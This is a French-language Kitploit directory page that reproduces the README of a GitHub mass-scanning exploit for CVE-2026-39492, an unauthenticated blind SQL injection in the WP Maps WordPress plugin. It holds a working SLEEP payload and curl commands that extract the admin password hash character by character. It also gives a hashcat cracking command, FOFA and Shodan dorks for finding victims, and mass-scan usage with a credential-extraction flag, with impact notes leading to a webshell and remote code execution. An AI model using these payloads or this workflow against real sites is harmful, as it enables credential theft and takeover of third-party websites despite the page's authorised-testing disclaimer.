Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-39492 — CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Scanner de masse par injection SQL aveugle non authentifiée | détection de type sqlmap | contournement de esc_sql() par backtick | 100K+ installations | Kitploit
Outils/GitHubGitHub/shinthink/cve-2026-39492
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubshinthink/cve-2026-39492

CVE-2026-39492

CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Scanner de masse par injection SQL aveugle non authentifiée | détection de type sqlmap | contournement de esc_sql() par backtick | 100K+ installations

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-39492 — Scanner d'injection SQL aveugle pour WP Maps

SQLi aveugle temporelle non authentifiée via contournement par backticks → extraction de la base de données


Vue d'ensemble

CVE-2026-39492 est une vulnérabilité d'injection SQL aveugle non authentifiée de sévérité critique (CVSS 9.3) dans le plugin WP Maps (wp-google-map-plugin) versions ≤ 4.9.1.

Le gestionnaire AJAX wpgmp_ajax_call est enregistré via pour un accès non authentifié. Le paramètre est transmis via — une fonction qui traite à tort comme un identifiant de colonne SQL de confiance, contournant complètement l'assainissement de WordPress.

wp_ajax_nopriv_
location_id
FlipperCode_Model_Base::is_column()
les entrées entourées de backticks
esc_sql()

Versions concernées

Version de WP MapsStatut
≤ 4.9.1Vulnérable
≥ 4.9.2Corrigée

Installations actives : 100 000+


Mécanisme de la vulnérabilité

Cause racine

Dans la couche d'abstraction de base de données du plugin, is_column() vérifie si l'entrée utilisateur est entourée de backticks :

root@kitploit:~
// Vulnerable: backtick-wrapped input treated as trusted column identifier
function is_column($value) {
    if (preg_match('/^`.*`$/', $value)) {
        return true;  // bypasses esc_sql() entirely!
    }
    return false;
}

Lorsque is_column() renvoie true, l'entrée est transmise directement à la requête SQL sans échappement esc_sql(). Cela permet :

root@kitploit:~
location_id=`1` AND SLEEP(5) AND `1`=`1

Déroulement de l'attaque

root@kitploit:~
1. Detect WP Maps via readme.txt → extract version
2. POST to /wp-admin/admin-ajax.php?action=wpgmp_ajax_call
3. Inject backtick-wrapped payload in location_id parameter
4. Measure response time — SLEEP(N) confirms SQL injection
5. Extract data via boolean/time-based blind technique

Pourquoi CVSS 9.3

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurAucune
PortéeModifiée (impacte toute la base de données)
ConfidentialitéÉlevée
IntégritéAucune
DisponibilitéFaible

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-39492.git
cd CVE-2026-39492
pip install -r requirements.txt

Utilisation

root@kitploit:~
# Single target detection
python cve_2026_39492.py -t target.com

# Mass scan
python cve_2026_39492.py -f targets.txt

# Mass scan + save results
python cve_2026_39492.py -f targets.txt -o sqli.txt

# Single target with credential extraction
python cve_2026_39492.py -t target.com --extract -v

# Verbose output
python cve_2026_39492.py -t target.com -v

Arguments

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save vulnerable targets to file
  --threads         Concurrent workers (default: 20)
  --extract         Extract admin credentials from confirmed targets
  -v, --verbose     Show detailed output

Preuve de concept

Cible unique

root@kitploit:~
$ python cve_2026_39492.py -t target.com -v
root@kitploit:~
  CVE-2026-39492 — WP Maps Blind SQL Injection Scanner
  CVSS 9.3 | Pre-Auth | wpgmp_ajax_call → Backtick Bypass

  Target: WP Maps (wp-google-map-plugin) <= 4.9.1
  Vector: admin-ajax.php?action=wpgmp_ajax_call → location_id
  Bypass: backtick-wrapped input bypasses esc_sql()

    [+] WP Maps detected: v4.9.0
    [*] SQLi test: 6.2s (threshold: 5s)
    [+] Blind SQLi CONFIRMED (response: 6.2s)

  Host        : target.com
  WP Maps     : YES v4.9.0
  SQLi        : YES
  Resp time   : 6.2s
  Time        : 7.1s

Avec extraction d'identifiants

root@kitploit:~
$ python cve_2026_39492.py -t target.com --extract -v
root@kitploit:~
    [+] Blind SQLi CONFIRMED (response: 5.8s)
    [*] Extracting admin credentials via blind SQLi...
    [*] Extracting: admin_user
    [*] Extracting: $P$BqVg...

  Admin User  : admin_user
  Admin Hash  : $P$BqVg7xX...

Scan de masse

root@kitploit:~
  CVE-2026-39492  WP Maps Blind SQLi Scanner
  Targets: 2500 | Threads: 20
  Vector: wpgmp_ajax_call → location_id backtick bypass
  ───────────────────────────────────────────────────────

  [SQLi]    target-vuln.com                                 6.2s  v4.9.0       resp:6.2s
  [SQLi]    wp-maps-site.com                                5.8s  v4.8.5       resp:5.8s
  [500/2500] 20%  |  WP Maps:47  SQLi:12  |  current-target.com

  ───────────────────────────────────────────────────────
  Scan complete  |  Time: 320s
  ───────────────────────────────────────────────────────
  Targets        : 2500
  WP Maps found  : 47
  SQLi confirmed : 12

Exploitation manuelle

Étape 1 — Détecter le plugin

root@kitploit:~
curl -sk 'https://target.com/wp-content/plugins/wp-google-map-plugin/readme.txt' | head -5

Étape 2 — Tester la SQLi avec SLEEP

root@kitploit:~
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND SLEEP(5) AND `1`=`1'

# Response > 5 seconds → VULNERABLE

Étape 3 — Extraire le hash admin via SQLi aveugle

root@kitploit:~
# Check first character of admin hash
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1'

# Response > 3 seconds → first char is ASCII 36 = '$'

Étape 4 — Cracker le hash et se connecter → RCE complète

root@kitploit:~
hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt

Dork FOFA

root@kitploit:~
body="wp-google-map-plugin"

Shodan

root@kitploit:~
http.html:"wp-google-map-plugin"

Impact

Une exploitation réussie permet l'extraction de la base de données WordPress complète :

  • Hashes de mots de passe admin → crack → connexion admin → téléversement de plugin → RCE
  • Données personnelles des utilisateurs, e-mails, jetons de session
  • Clés API stockées dans wp_options
  • Si le privilège MySQL FILE existe : SELECT ... INTO OUTFILE → webshell → RCE directe

Avis de non-responsabilité

UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS AUTORISÉS.

Ce logiciel est destiné aux professionnels de la sécurité menant des tests d'intrusion autorisés, aux organisations auditant leur propre infrastructure et aux chercheurs étudiant l'exploitation de vulnérabilités.

L'accès non autorisé à des systèmes informatiques est illégal et peut enfreindre :

  • États-Unis : Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonésie : UU ITE Pasal 30 & 46
  • Union européenne : Directive 2013/40/UE
  • Royaume-Uni : Computer Misuse Act 1990

Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.


Références

RessourceLien
IONIX Advisoryionix.io/threat-center/cve-2026-39492
WPScan Advisorywpscan.com/vulnerability/c1f19d2e
Wordfence Advisorywordfence.com
Entrée NVDCVE-2026-39492
Plugin Tracwp-google-map-plugin

Ce projet n'est pas affilié à Flipper Code ou WP Maps.

Télécharger l’outil